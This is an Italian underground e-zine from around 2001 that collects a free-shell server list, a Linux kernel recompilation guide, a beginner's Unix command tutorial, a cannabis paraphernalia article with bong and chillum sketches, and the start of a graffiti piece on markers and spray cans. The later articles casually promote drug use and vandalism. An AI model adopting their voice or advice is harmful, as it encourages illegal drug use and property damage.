un server tipo IRIX oppure Solaris così da poter capire come funzioni il sistema senza
installarvelo!
Lista server per freeshell:
http://www.freeshells.net/
http://www.continuum.eu.org/
http://dishboy.dyn.ml.org/
http://www.nyx.net/
http://vester.dynip.com
http://www.vexation.org/
http://www.arbornet.org/projects.html
http://www.unixnet.org/
http://www.nether.net/
http://www.lanck.ru/
http://sdf.lonestar.org/
http://suburbia.com.au/
http://www.nyx.net/
http://www.shellyeah.com/
[]---[FeLtOnSpRaY]---[]
[]---[ feltonspray@katamail.com ]---[]
·······························································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ o __ __ __ __ __ o | __ __ o __ __ ___ |__, ___ __ __ ___ |
| ' | (___ (__) | ) ) |__) | |_, (__( (__ | (__) | ) (__/_ | \ (__/_ | ' | ) (__/_ |_,
|
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: RiCoMpIlAzIoNe DeL kErNeL]
[Autore: FeltonSpray]
Intro....
Beh visto che tanti nuovi linuxiani non sanno ricompilarsi il kernel
ho creato questo txt che li potrà aiutare in questa delicata fase,
bisogna sapere che linux viene fornito con un kernel generico tanto
da permettere di utilizzare le parti essenziali, poi bisogna compilarselo
in base al propio hardware e alle propie esigenze......
Io personalmente ho usato la:
Mandrake Linux 7.2
Kernel 2.2.18 (Notate che la mia distribuzione di serie aveva il kernel 2.2.17)
Per la mia compilazione il kernel di serie lo dovuto levare a causa di problemi
cmq io consiglio il 2.2.18 poi fate voi
--------------------------
| URL DA DOVE SCARICARLO |
! |
| http://www.linuxhq.com |
--------------------------
Prima di iniziare un'ultimo consiglio: Ricordate tutto il vostro hardware
State attenti a non generalizzare se non ricordate senno al caricamento di
linux rischiate un bella scritta tipo [FAILED]... oppure una bella X rossa
nella mia distribuzione =)
>>--> ADESSO SI PARTE <--<<
Quindi vi spiego prima di tutto come installare i sorgenti:
cd /usr/src (la dir dei sorgenti)
rm linux (rimuoviamo il link simbolico)
mkdir linux-2.2.18 (Adesso creiamo la dir in cui copieremo il nostro kernel)
ln -s linux-2.2.18 (creiamo il link alla dir del kernel)
tar xzvf /percorso/linux-2.2.18.tar.gz ./ (cambiate il percorso a seconda di dove avete il kernel)
rm -rf linux-2.2.1X* (il kernel vecchio) *=Varia a seconda del vecchio kernel
cd linux
Adesso abbiamo finito di copiare il nostro kernel adesso possiamo configurarlo
Andate nella directory del nuovo kernel (da un terminale) e scrivete "make xconfig"
Adesso eseguira dei comandi in automatico e si aprirà un form con tanti bottoni
che corrispondono a diverse impostazioni (hehe scontato ;p) quindi cominciate dal
primo e man mano che finite una parte clikkate sul bottone "NEXT" in basso al
centro per andare automaticamente avanti. Naturalmente non mi metto a spiegare
ogni singola voce visto che sono facili da capire (anche con un minimo di inglese)
oppure accanto ad un comando c'e il bottone "HELP" andate su Yahoo e gli scrivete
il testo e ve lo traduce oppure usate il vocabolario CMQ IO VI CONSIGLIO DI
IMPARARVI BENE L'INGLESE SENNO SARETE A MARI (come si dice qui ;p). Ogni voce
che man mano si attiva ho disattiva si presenta con tre possibili scelte:
N m Y. Cmq ricordate che ancora non state compilando niente state solo
modificando un semplice file txt tra un po arriva il bello =) quindi.....
Appena finite tutto uscite e salvate e sempre nella stessa directory dove avete
scritto "make xconfig" cominciate a lanciare i seguenti comandi (la compilazione
vera e propia"
make dep
make clean
make bzImage (occhio alla maiuscola) (ricordate sempre che linux è a case-sensitive?)
make modules
make modules_install
Appena terminate tutti i comandi prendete il file System.map sempre nella stessa cartella
e copiatelo su /boot/
quindi sempre dalla directory lanciate "cp System.map /boot/"
Adesso e necessario aggiornare lilo: (usate lilo e non grub) { /etc/lilo.conf }
Esempio della modifica che ho apportato al mio lilo.conf cmq basta che seguite
le scritte riportate nel vostro lilo.conf poi interpretarli sono una cavolata.
image=/boot/my_kernel
label=my_kernel
root=/dev/hda7
append=" mem=160M hdc=ide-scsi ide1=autotune ide0=autotune"
vga=788
read-only
Adesso aggiorniamo il mbr scrivendo "lilo" e purtroppo questa è l'unica volta
che il linux ha bisogno di un reboot riavviate e controllate la fase di caricamento
se vi da qualche failed rimodificate il kernel nella voce del failed e ricompilate
il tutto se invece non vi da errori correte a comprare una torta per festeggiare
la vostra prima ricompilazione.
>>---> Adesso si finisce =( <---<<
Anche questo txt è arrivato al termine spero di essere stato chiaro e coinciso
e che non vi abbia fatto rovinare tutto =) scherzo cmq se avete bisogno di
consigli aiuti etc.. feltonspray@katamail.com
vi saluto, FeLtOnSpRaY
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ o __| __ __ __| __ o \_'
(__| (__(_ | (__| (__( (__( (__| (__(_ | ) | / \
__/
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Guida ad Unix]
[Autore: Rhost]
Guida a Unix
(Guida, non hack)
Vi anticipo subito di kosa parlerò in questa guida, così a ki non interessa può fare a meno di leggerla. :o\
· Come iniziare
· I comandi principali
· La programmazione con la shell di Bourne e la C shell
· Programmazione in C in ambiente Unix
Ringraziamenti:
Qui ci si dimentica sempre di qualcuno vabbè.
1. Ringrazio gli SPP tutti ed in particolare -=RigoR MorteM=- per la sua cordialità
2. Cookbooker per essermi ankora amiko ed aver creato l UMCREW
3. Tutti quelli ke mi danno una mano nella lotta alla pedofilia
4. Ulisses1 per avermi dato la possibilità di ricambiargli un favore fattomi
5. La LeGaCy_Of_KiNgS per credere ankora in me (presto un nuovo sito)
Gli argomenti trattati partono dal presupposto ke abbiate già il sistema operativo installato e quindi riusciate almeno ad arrivare a questo punto:
unixtype!login:_
dove inserirete il vostro ID utente e poi avrete
Password:
dove inserirete con molta attenzione la vostra password, questa non è leggibile durante la digitazione quindi in caso di errore avrete un messaggio fatto così:
login incorrect
Se avete inserito tutto correttamente vedrete visualizzato il prompt della shell e sarete pronti ad utilizzare i comandi Unix.
Unix dispone di parekkie shell utilizzabili, quelle disponibili dipendono dalla versione di Unix installata, la shell è in pratika linterfaccia fra voi ed il computer, le due shell più famose sono la shell di Bourne e la C shell . Le shell le potete distinguere dalla diversità del prompt, quella Bourne utilizza il simbolo $, la C shell invece il simbolo % con un contatore ke tiene nota dei comandi ke date, avrete quindi 1%, 2%, 3% ecc... Le due shell fondamentalmente lavorano allo stesso modo, quando citerò comandi ke si differiscono lo farò presente, sempre se mi ricordo...
Faccio un esempio delle differenti shell? Ok, lo faccio:
xenix386!login: rhost
Password:
Welcome to SCO XENIX System !
From
The Santa Cruz Operation, Inc.
Terminal type is ansi
$_
login: rhost
Password:
Welcome to UCXX Unix.
1%_
1. Le shell di Unix
Cè da dire ke alkune installazioni hanno shell molto più complete, ma a parte il fatto ke non le conosco tutte... non finirei mai questa guida se dovessi citarle, quindi tratterò solo queste ke sono da considerarsi quasi degli standard, anzi la shell di
Bourn ($) è davvero quella standard di Unix.
Più andremo avanti, più vi renderete conto ke questa guida non ha ne capo ne coda, cioè non avrà un inizio, una parte centrale ed una fine, ma sarà come mi viene in mente.
Abbiamo dunque parlato dellaccesso al terminale inserendo Id e Password, ora invece di continuare con il corpo della guida, vediamo come ci si disconnette dal sistema e non perkè la guida finisce qui, è solo ke lo dico adesso come ci si disconnette e mi tolgo il pensiero.
2. Scollegamento
Quando terminate una sessione di Unix dovete scollegarvi dal terminale, se non lo fate qualcun altro potrebbe avere accesso immediato ai vostri file. Se vi scollegate correttamente sullo skermo riapparirà il prompt di login. Il processo di scollegamento varia a seconda della shell utilizzata, la shell di Bourne ($) usa il comando EXIT, mentre la C shell usa il comando LOGOUT, in quale caso funzionano ambedue i comandi, ma non kiedetemi il perkè ke non lo so.
Per esempio se al promp %_ digitate exit , Unix potrebbe rispondere inviando il comando logout , ma se avete il prompt $_ e digitate logout , vedrete il messaggio logout: logout not found, spiegando ke il comando logout non è valido.
Quasi tutte le versioni di Unix riconoscono il comando Ctrl-D come una rikiesta di scollegamento, ma mi sembra di aver capito ke in molte installazioni di Unix questo comando sia stato disabilitato, in quanto la rikiesta di disconnessione immediata termina anke altri processi di Unix.
3. Inserimento delle righe di comando
Quando digitate dopo il prompt della shell, state inserendo dei caratteri un unarea di memoria nota come Buffer della riga di comando . Quando pigiate RETURN alla fine della riga di comando, Unix accetta il contenuto del buffer come ruga di comando e lo elabora. Se Unix non capisce il vostro comando vi invierà un msg di errore come: command: not found . Quando succede questo, rileggete il comando ke avete dato, di solito vi renderete conto di aver commesso un errore di battitura. Per esempio se siete nella C shell e digitate logoff vi verrà visualizzato quellerrore e vi renderete conto ke il comando corretto era logout e non logoff.
4. Operazioni sui file
Precisiamo ke Unix distingue tra maiuscole e minuscole, per cui il comando cp , non può essere digitato come CP ed aspettarvi ke funzioni. Uno dei comandi + semplici è per esempio quello di far visualizzare ad Unix la data e lora. Basta digitare date dopo il prompt della shell per ottenere questo:
$ date
Sun Mar 11 13:59:43 PDT 2001
Quindi riapparirà il prompt della shell $ in attesa di un nuovo comando, in quanto il comando date non rikiede alkuna informazione da voi.
Per visualizzare a video il contenuto di una directory il comando da da re è ls , per avere cioè una LiSta del contenuto della dir. Se la vostra cartella contiene file allora avrete un risultato + o - simile a questo:
$ ls
indirizzi
lamahlist
slava_doc
$_
I file vengono visualizzati alfabeticamente, ma si può associare al comando ls quale opzione per avere una visualizzazione personalizzata.
(spero di ricordarmeli tutti o quasi)
Comando: ls
Scopo: Elencare i file in una directory
Formato: ls [opzioni] [lista-file]
Opzioni:
-a Elenca tutti i file, compresi quelli nascosti.
-d Elenca soltanto i nomi delle direcotory, non dei file ordinari
-g Mostra info sui gruppi di un elenko
-l Mostra le liste lunghe con informazioni estese
-r Produce una lista in ordine inverso
-s Produce un elenko per dimensione crescente
-t Elenca in ordine di tempo, a partire dal + recente
Queste opzioni possono essere associate, cioè possiamo dare il comando ls mettendo 2 opzioni, quindi ls - ra . Lopzione + usata (da me) è ls -l ke produce un elenko lungo come questo:
ls -l
-rwxr-xr-x 1 rhost 14334 Nov 19 14:58 indirizzi
-rwxrw-r-x 1 rhost 1298 Mar 3 09:32 lamahlist
-rw-rw-rw 1 rhost 8900 Feb 12 09:56 salva_doc
(accesso) (link) (user) (dimens) (ultima modica) (nome file)
Da notare ke i nomi dei file sono posizionati a dx della skermo, alcune versioni di Unix però possono mostrare questo elenko in modo leggermente diverso, potreste ottenere per esempio oltre al nome utente (user) anke il nome del gruppo di appartenenza, ma non so dirvi esattamente quali versioni siano. Le altre opzioni limitano o espandono il nr di file ke sono elenkati . Ogni directory contiene file nascosti oltre a quelli ke vedete elencati, se attivate lopzione -a nel comando vedrete i nomi dei file nascosti oltre a quelli ordinari.
Per ottenere la visualizzazione di un calendario, (voi direte: Ma a noi ke ce frega der calendario?) Zitti!!! Capirete perkè. Dicevo, per visualizzare a video un calendario il comando da conoscere è cal .
Alkuni sistemi al comando cal visualizzano il mese precedente, quello in corso ed il successivo, altri invece non conoscono il comando senza argomenti, cioè per visualizzare un mese il comando sarà:
cal 3 2001 per lanno cal 2001.
5. Ridirezione
Abbiamo detto quindi ke il comando cal ci permette di avere a video un calendario... ma se noi lo volessimo su file? Boh!! J
Useremo la ridirezione nella riga di comando per cambiare loutput dallo skermo del terminale ad un file. (per output intendo lo skermo, per input la tastiera, dovevo dirlo prima, ma non mi va di tornare indietro e trovare un punto adatto per inserirlo).
Il simbolo di ridirezione è il segno maggiore sulla tastiera (>). Se digitate cal 2001 > anno2001, il calendario del 2001 non viene visualizzato a video, ma verrà inviato in un file denominato anno2001, se date il comando date > salva.data, le informazione su data e ora ke normalmente sarebbero visualizzate a skermo, saranno trasferite nel file salva.data. Allo stesso modo potete creare un file contenente lelenko della directory. Il comando da dare è ls > mieifile, dove mieifile conterrà loutput del comando ls. Siccome Unix è stupido, perkè crede ke noi siamo intelligenti, presume ke quando diamo un comando sappiamo al 100% quello ke stiamo facendo e quindi non si preokkupa di avvisarci sei il file mieifile esiste e lo sovrascrive... :o\ ma noi siamo sicuri di ciò ke stiamo facendo? Io no, mai. Per ridurre il problema possiamo ridirezionare il file con 2 segni >>, in questo modo Unix accoderà il contenuto del nuovo file a quello esistente, ponendolo cioè alla fine di questo.
6. Operazioni sui file
Adesso vedremo come visualizzare il contenuto di un file sullo skermo, copiare i file, spostarli e rinominarli, cancellarli e farli stampare.
Comando: cp
Scopo: Copiare un file.
Formato: cp file-sorgente file-destinazione
Esempio: cp file1 file2
Risultato: Ci sono ora 2 file identici con nomi differenti.
Si può quindi copiare un file ed assegnare alla copia un nuovo nome, producendo così 2 file identici. Il comando cp quindi serve per CoPiare i file. Se nominate un file sorgente inesistente avrete un msg di errore tipo: cp: cannot access file inesistente . Se invece nominate un file di destinazione ke esiste non avrete msg ke avvisano la sovrascrittura .
Potete rinominare un file tramite un comando simile, il comando mv serve a MuoVere (spostare) il contenuto di un file sorgente in uno di destinazione, cancellando a sua volta il sorgente, cioè rinomina il file sorgente con quello di destinazione lasciando 1 solo file destinazione... non ho capito neppure io...
Questo comando può essere utilizzato per trasferire un file in una directory diversa.
Comando: mv
Scopo: trasferire o rinominare un file
Formato: mv sorgente destinazione
Esempio: mv file1 file2
Risultato: Esiste un solo file col nome di destinazione
Per cancellare i file invece il comando è rm da RiMuovere. Il comando senza opzioni non kiede conferma dellesecuzione...
Comando: rm
Scopo:(raramente) Rimuove uno o più file.
Formato: rm [opzione] file
Opzione: -i (chiede conferma prima di cancellare)
Esempio: rm lamahlist
Risultato: Il file non è più visualizzato ne disponibile
Spesso vorrete vedere cosa contiene un file prima di cancellarlo o modificarlo, per questo potete utilizzare il comando cat ke però... questo comando ha molti usi ed effetti diversi, uno dei quali è il conCATenamento dei file. (Questa sarà dura....)
Se usate il comando cat senza argomenti, questo utilizzerà i dispositivi standard di input ed output (tastiera e video)... se digitate una riga dalla tasiera con il comando cat, questa verrà ripetuta sullo skermo, se utilizzate la ridirezione e nominate un nuovo file inserirete i dati direttamente dalla tastiera nel file, se con il comando cat utilizzate il nome di un file esistente, questo verrà visualizzato sullo skermo. Potete anke utilizzare il comando cat per concatenare file con i simboli di reindirizzamento > e di aggiunta alla coda >>.
Ok passiamo al dettaglio...
Quando inserite dalla tastiera il comando cat file1, lintero contenuto del file1 verrà visualizzato sullo skermo. Se la visualizzazione dovesse superare una pagina video si può bloccare lo scorrimento con la combinazione dei tasti CTRL+S e riprenderla con CTRL+Q. Si può utilizzare anke il comando more come nel dos, am ne parleremo fra un po.
Potete copiare file con il comando cat o concatenarli tramite la ridirezione, per esempio se utilizzate il comando cat file1 > file2 ha esattamente lo stesso effetto di cp file1 file2, cioè copia un file su un altro senza modificare loriginale. E possibile anke combinare dei file, con comandi come cat file1 file2 > file3. In questo caso i 2 file (file1 e file2) sono stati inviati in sequenza ad un file ridiretto (file3).
Come creare un file tramite il comando cat:
Come avevo detto prima se utilizzate il comando cat senza argomenti, sto scemo non farà altro ke ripetere ciò ke scrivete :o\.. avrete quindi...
$ cat
<Questo è un esempio
Questo è un esempio
<di quello ke akkade quando
di quello ke akkade quando
<si usa cat senza argomenti
si usa cat senza argomenti
In pratica Unix continuerà a dare il prompt dei comandi in attesa dellinserimento di una nuova riga, potete terminare questo effetto tramite il comando CTRL+D.
Se usate la ridirezione potete usare cat per inviare linee ad un file esistente cioè:
$ cat > indirizzi
Stefano Grimaldi
Viale Manzoni, 5
20100 Milano
$ _
Quando premerete CTRL+D, il comando cat è terminato ed il file appena creato viene kiuso. Se poi usate il comando cat indirizzi verrà visualizzato sullo skermo quello ke avete digitato.
Il comando more:
Questo comando more (ankora) è disponibile in quasi tutte le installazioni di Unix, il suo scopo è solo quello di visualizzare un file, in pratika visualizza il contenuto di un file blokkandosi pagina per pagina visualizzando la dicitura ---More--- ed un valore in % di quanto è stato visualizzato fino a quel momento.
Per proseguire nella visualizzazione bisogna premere spazio dalla tastiera e si avrà la skermata successiva.
Stampare i file:
Per stampare i file con Unix ci sono diversi modi. Il modo + semplice è quello di inviare direttamente il file alla stampante. Unix ha un sistema di spooler di stampa per cui tutti i file vengono inviati ad una coda di stampa. Il comando di stampa è lpr (Line PRinter), non è possibile stampare programmi eseguibili ne file binari, a meno ke non riuscirete a visualizzare questi file sullo skermo del pc. Nel comando potete nominare uno o più file per poter dare una sequenza di stampa, se per esempio scriviamo lpr indirizzi otterremo + o - questo:
$ lpr indirizzi
request id is prop-9 (1 file)
$_
Il request id serve per individuare ed eventualmente eliminare il processo di stampa utilizzando per esempio il comando cancel prop-9 rimuoverete il file dalla coda di stampa. Se la stampa fosse già partita, si blokkerebbe nel punto in cui noi blokkiamo il processo. La stampa effettuata con lpr è priva di formato, cioè il testo viene stampato di continuo senza interruzioni di pagina. Per ottenere una stampa più ordinata dovreste utilizzare un editor di testi come vi o procurarvi un programma di formattazione testo.
Comando: lpr
Scopo: Stampare uno o più file in locale
Formato: lpr [opzioni] [file]
Opzioni: -c Copia un file prima di stamparlo
-m Usa mail per avvisarvi ke la stampa è terminata
-r Rimuove il file dopo averlo stampato
Esempi: 1) lpr indirizzi
2) lpr -c salvato
3) lpr -r nuovofile indirizzi
7. Le directory ed i file di Unix
.... Boh?
Il sistema operativo Unix gestisce... no
Il sistema operativo Unix impiega una struttura di directory ad albero, cioè gerarkika, per memorizzare i file. La directory primaria, cioè radice, è in cima allalbero. Ogni directory può contenerne altre così come può contenere file... ma ke sto a di? .....ok.
Partendo dalla dir principale (radice), al suo interno ne troveremo altre ke riameremo di sistema, cioè necessarie al sysop (sistema operativo) per il suo corretto funzionamento. Per esempio la dir bin contiene i file binari dei programmi di servizio, la directory dev comprende i file ke descrivono i vari dispositivi (device) ke Unix può usare, inclusi terminali e stampanti. La directory usr contiene una directory per ogni ID utente (user) riconosciuto dal sistema.
Quando lavorate con Unix, la directory in cui vi trovate al momento, è riamata directory di lavoro, di default o corrente. Quando ricollegate con Unix, siete posti automaticamente nella dir prestabilita per il vostro user id, per cui è la vostra directory di lavoro, cioè la home direcory.
Per sapere qual è la vostra dir di lavoro potete usare il comando pwd , sullo skermo apparirà il nome completo della dir in cui vi trovate:
$ pwd
/usr/rhost
$_
La dir stessa si kiama rhost, il resto specifica il percorso in cui questa si trova. Lo slash (/) allinizio della riga la dir radice, gli altri congiungono in sequenza i nomi delle successive. Per indicare un particolare file occorre mettere uno / dopo lultima dir indicata, cioè il percorso per il file indirizzi nella cartella rhost sarà:
/usr/rhost/indirizzi, cioè il file indirizzi si trova nella cartella rhost ke a sua volta si trova nella cartella usr e questa alla fine è contenuta nella dir radice .
Se per esempio il vostro nome utente è laming la vostra cartella di lavoro sarà /usr/laming, ma con la shell di Bourne per fare riferimento alla vostra home, potete digitare $HOME ke korrispnde a /usr/laming, nella C shell il comando %HOME ha lo stesso effetto.
Come avevo scritto prima per visualizzare i file della vostra directory di lavoro potete utilizzare il comando ls, ma potete usare questo comando anke per vedere i file di unaltra dir. Ad esempio, potete usareil comando ls /usr per visualizzare il contenuto della dir /usr, mentre con ls / vedrete i file della dir radice.
Su Unix non è semplicissimo distinguere un file da una directory, per vedere quali sono le dir usate lopzione -l (elle). Il primo carattere di una riga sarà allora d per le directory ed un - per file di altro tipo:
ls -l (elle)
-rwxr-xr-x 1 rhost 14334 Nov 19 14:58 indirizzi
drwxr-xr-x 1 rhost 1298 Mar 12 11:32 progetti
-rw-rw-rw- 1 rhost 8900 Feb 12 09:56 salva_doc
$_
Il secondo file visualizzato è una directory e si kiama progetti . Anke il comando -d può essere utile, ma si limita alla visualizzazione delle sole dir:
ls -d
progetti
$_
oppure:
ls -ld
drwxr-xr-x 1 rhost 1298 Mar 12 11:32 progetti
progetti
$_
Quando fate riferimento ad un file ke si trova nella vostra directory di lavoro, potete specificare direttamente il nome del file. Se il file si trova in una dir diversa allora dovete specificare il percorso di questo. Fate conto ke la vostra dir di lavoro sia rhost e ke quella di un vostro collega ke lavora allo stesso progetto sia darkman , allora le vostre rispettive dir saranno : /usr/rhost e /usr/darkman . Per far stampare il file indirizzi nella vostra cartella di lavoro userete lpr indirizzi , se invece volete stampare lo stesso file ma dalla cartella di darkman il percorso di stampa sarà:
lpr /usr/darkman/indirizzi. Naturalmente dovete avere il permesso di accedere alla cartella del vostro amico, ma della sicurezza ne parleremo dopo. Quindi inserendo il percorso di ogni file possiamo associare qualunque comando.
I comandi cp ed mv ci permettono di specificare una directory o un file su cui copiare o trasferire un file:
lpr /usr/rhost/indirizzi
cat /usr/rhost/indirizzi
cp /usr/rhost/lamahlist lamahlist2
cp backdoor /usr/darkman/pamela
mv blazerstrong /usr/darkman/ahah
rm /usr/darkman/pamela
Unix riesce a distinguere le directory in modo particolare...
Per esempio se io fossi nella dir /usr/rhost, posso dire ke la dir usr è padre della dir rhost, quindi Unix riconosce con / la radice, con . la dir di lavoro e con .. la directory immediatamente sopra a quella di lavoro...
Quanto amo gli esempi:
Se mi trovo nella cartella /usr/rhost e voglio andare nella cartella darkman, mi basta digitare ../darkman. Così facendo è come se dicessi a Unix: Parti dal padre della directory corrente, trova la directory darkman sotto di essa e rimani la.
Ricordatevi ke per avere accesso in altre cartelle di lavoro dovete avere laccesso autorizzato.
Per verificare i diritti di accesso in una directory potete usare il comando ls -l /usr, potreste avere un elenko simile:
drwxr-xr-x 2 rhost 1298 Mar 13 12:20 darkman
Se la linea inizia con drwx , allora avrete tutti i diritti di accesso di cui avete bisogno per operaresu questa directory.
Per creare una directory il comando è mkdir (MaKe DIRectory:crea directory).
Supponiamo di essere nella cartella rhost e scriviamo mkdir prova, Unix creerà una nuova dir dal nome prova. Se poi digitatez il comando ls vedrete ke il nome prova sarà presente nellelenko dei file.
Se digitate il comando ls -l vedrete ke prova sarà indicata come dir e non come file. Quindi il comando mkdir /usr/prova creerebbe una nuova dir al livello sottostante a quello di /usr .
Potete dunque divertirvi a creare dir a piacimento, purkè siano sempre ben catalogate, avrete notato ke kon Unix non si usano click di mouse per aprire o cercare cartelle, quindi vi consiglio di essere sempre molto ordinati.
Esempio:
$ pwd
/usr/rhost
$ mkdir progetti
$ mkdir ricerca
$ mkdir progetti/bbs
$ mkdir progetti /dos4
$ mkdir progetti/cobol
$ mkdir ricerca/japan
$mkdir ricerca/japan/baud2400
$ pwd
/usr/rhost
$_
Notate ke la cima delle struttura è la vostra home directory, rhost, anziché la home radice.
Per lultima dir creata ricerca /usr/rhost/ricerca/japan/baud2400 avreste potuto usare $HOME/ricerca/japan/baud2400.
Fine Prima Parte ;o)
_____________________________________________________
| __ _ ___ _____ _____ _____ ______ |
| | \ | | / | | _ \ / ___| / _ \ |___ / |
| | \| | / /| | | |_| | | | | | | | / / |
| | |\ | / / | | | _ / | | | | | | / / |
| | | \ | / / | | | | \ \ | |___ | |_| | / /__ |
| |_| \_| /_/ |_| |_| \_\ \_____| \_____/ /_____| |
-----------------------------------------------------
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ __ __ __ __
| ) (__( | ' (___ (__) __)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: NARCOS(o qualcosa del genere)]
[Autore: FREESTO]
eccomi qua per fare un bell'articolo che vi servirà di sicuro nella vita (:-D hihihi)...NARCOS...o meglio...STRUMENTI...:)
dato che sono contro l'alcool eccetto quello che va nel bong(e non ne so niente)o di altre droghe,parlerò solo di ganja e fumo...se non vi va bene fate un articolo voi e mandatelo :-D
~~~~~~~
CIBO: fra poco mangio:ravioli al ragù
"ROBA" BEVUTA: mha...nada...sono contro l'alcool ma sto sorseggiando fanta :)
"ROBA" FUMATA:):naaaa son ancora storto da ieri sera,scherzo io sono un bravo bimbo..no?
TEMPO:diciamo mezz'oretta?
MUSICA:missione impossibile(in questo momento joe cassano...dimmi che ganja usi,albanese ammoniacata?sicuro che ne abusi...rest in peace gio!)
SALUTI:my love weeda,my click ebc,6mani,#doppiah,mangiare,cure,mystic,cookbooker,ulisses1,felton...
FUCK TO:umh...fanculo a chi mi sta sul cazzo(non ho voglia di scrivere tutti...)
FRASE LIBERA:LEGALIZZALA!
ALTRO DA DICHIARARE?:sono innocente!
~~~~~~~
qua devo metterci il solito diclaimer?umh...qua ci stanno solo informazioni se fate qualcosa e andate nella merda cazzi vostri io non centro e io son pulito non ho mai fatto niente! :)
ok iniziamo...qua non ci starà un testo sulla coltivazione xchè...non son capace ok?non c'ho mai provato
qua parliamo un po' di...STRUMENTI
vai!cartine(smocking),ganja,filtrino,sigarette,strumenti vari...
per una cannetta normale non penso che ci siano spiegare molte cose...cartina(smocking rulez)ganja o fumo,filtrino fatto con bigliettini del treno :))la sigaretta per lo svuotino...
CILUM
o come cazzo si scrive...CEELOOM bho
oh cazzo ma riuscirò a spiegare bene?
è una cosa...che ci metti dentro un coso così da ottenere una cosa...scherzo
è una specie di tubo con una pietrina dentro(che fa da filtrino)dentro ci va quello che bisogna metterci :)si accende,si fuma,si finisce e si svuota(questa parte è dura...)
il cilotto spacca,ma il brutto è che dopo qualche tiro è tutto finito,secondo me è bello gustarsi la ganja o no?
è fatto + o - così
___ <--qui va messa la robaccia che usate voi drogatoni!schifosi...:)
| |
| |
| |
\_/ <--da qui si tira shhhh shhhhhhhhhhhhhhh e dentro va messa la pietrina
che roba è?sembra un cazzo
occhio a non farlo cadere che si spacca!
per pulirlo usate dei fazzoletti(che non si rompino facilmente)e li infilate dalla parte dove va messa l'ashish o ganja,è un'impresa ARDUA!
BONG
cazzo questo si che ti spacca,se il bong è buono!
penso che sia tipo il narghilè,o forse è la stessa cosa,o forse...non so!
qua ci vuole oltre alla roba elencata prima anche acqua o qualcosa di alcolico(se alcolico stona di + e alla fine va bevuta...l'altra volta il vino dentro faceva schifo ma ci ha dato una bella botta,dato che il THC rimane nel liquido,eccetto l'acqua...o almeno credo)
vai con i disegni(sul pc sono un disastro...aiuto,help,s.o.s...)
____ <---qui va messa la roba da fumà
\ /
_||_
/ \ <---se ricordo bene qua si svita e si mette l'acqua o alcool
| |
\____/===== <---di qua si tira SHHH SHHHHHHHHZZZZ
e poi si tossisce :)
spacca di brutto,se mettete dell'alcool il fumo prenderà un po' di quel gusto
il bong si può fare anche con una bottiglia...non faccio il disegnino che non ci sto + dentro...xò se avete capito com'è fatto un bong pensate come si può farlo con una bottiglia...c'è bisogno di una canna al posto del posto dove mettere la roba...
minchia son proprio un disastro a disegnare sti cosi
PIPETTA
o come si chiama..io la chiamo così
in pratica è uguale al bong...non riesco a disegnarlo mi spiace...è un tubo arrotolato dove va messa acqua,da una parte va infilata la canna,dall'altra si tira SHHHH SHHHHHZZZ(se non l'avete capito questo è il rumore di una MEGA-ULTRA-EXTRA tirata) :)
CARTINE A BANDIERA
cazzo non abbiamo cartine lunghe...c'abbiamo solo quelle merdose rizla corte come facciamo?!?
tranquilli ragazzi ci pensa il mago freesto :))
___________
| | LA CARTINA VA MESSA IN ORIZZONTALE
| |
|.........|<--la colla è in basso
| \|
| \|
| \|
| \|
|___\|
la colla sta volta è in verticale,come la cartina
quindi una cartina rimane attaccata all'altra e forma una cartina lunga...no?,poi si gira e si trappa la carta in eccesso...
c'è bisogno di due cartine corte...mi sembra che dal disegno si capisca come vanno messe "\|" e ".." è la colla
se date retta a me prendetevi le rools o le smocking :)
qua è tutto!ci si becca nel prossimo numero di UNDERGROUND MAGAZINE...mo stiamo cercando di fare il chan irc...che schifo di articolo che è venuto fuori...mi scuso con quelli che disegnano in asci! :-) ci si becca rigaz!!!
PEACE & RESPECT
FREESTO
www.ebclick.cjb.net
__________________________________________________________
| _ __ _____ _ _____ _ __ _ _____ |
| | | / / | _ \ | | |_ _| | | | \ | | / ___| |
| | | __ / / | |_| | | | | | | | | \| | | | |
| | | / | / / | _ / | | | | | | | |\ | | | _ |
| | |/ |/ / | | \ \ | | | | | | | | \ | | |_| | |
| |___/|___/ |_| \_\ |_| |_| |_| |_| \_| \_____/ |
----------------------------------------------------------
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ o _|_ o __ __
(__(__( | ' | |_, | | ) (__|
__/
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Writing (parte 2)]
[Auore: freesto aka lacri l'acrilico]
musica ascoltata:DE LA SOUL (old school style!)
cibo:ho appena finito di mangiare...
bibita:leggete sopra
saluti e thx:my love weeda,la mia cru ebclick(www.ebclick.cjb.net),6maniclick,komboclustasquad(bunjee, rode, radon),il resto di #doppiah(cernusco,nash,rokkosmiko,iceflame,djciussa...) e i saldini, mang(M4nG|4r3),cure, mystic,cookbooker,ulisses1,umcrew, e tutti quelli che mi sono dimenticato SEMPRE IN FOTTA UOMO
FUCK TO:verrebbe molto lunga sta lista...ma riassumiamo...i politici,i pulotti,tabbozzi,bill gates,il negozio di computer sotto casa mia
~~~~~~~~~~~~~~~
allora eccoci finalmente al secondo numero di underground magazine,nell primo numero penso di essere stato noioso ma in qualche modo dovevo iniziare,ora inizia il bello(spero)nei prossimi numeri parlerò anche della cultura hiphop e di tutto quello che posso,che ho voglia e che cukbuker mi fa dire :-)
vai si inizia
ricordate che se volete andare a dipingere o a "imbrattare" i muri io non centro e son cazzi vostri,questo è solo un testo di info e blablabla,quindi se vi sgamano non cagatemi il cazzo,è illegale
(e se dovete devastare fatelo bene,non come me :-) )
MARKER:
i pennarelli,si chiamano anche taggarelli,ne esistono di molti tipi e dimensioni, a vernice,inchiostro,tempera...1cm,0.5,2,3,4,5,6 e cosi via
sconsiglio i marker troppo grossi,prendeteli solo se fate bombing in metro,autobus,treni...
quelli da 2 e 1 bisogna averli...
BOMBOLETTE:
bombole,boccie,bonze,bombz...
molte marche...
montana(che consiglio...secondo me le migliori),
